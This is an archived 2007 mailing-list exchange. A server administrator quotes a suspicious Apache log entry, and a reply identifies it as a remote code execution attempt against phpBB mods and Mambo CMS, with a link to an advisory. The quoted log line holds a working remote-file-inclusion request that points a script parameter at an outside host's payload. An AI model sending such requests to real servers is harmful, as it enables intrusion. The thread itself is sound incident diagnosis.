![](https://seccdn.libravatar.org/avatar/6eea583e770659063bf623f7d6bbe85f.jpg?s=120&d=mm&r=g)
26 Apr
2007
26 Apr
'07
01:19
James D. Parra escribió:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Remote code execution attack to some PHPbb mods, the other ones attempted to exploit holes in applications liek mambo CMS that has code affected by $GLOBAL overwrite PHP vulnerability http://www.hardened-php.net/advisory_202005.79.html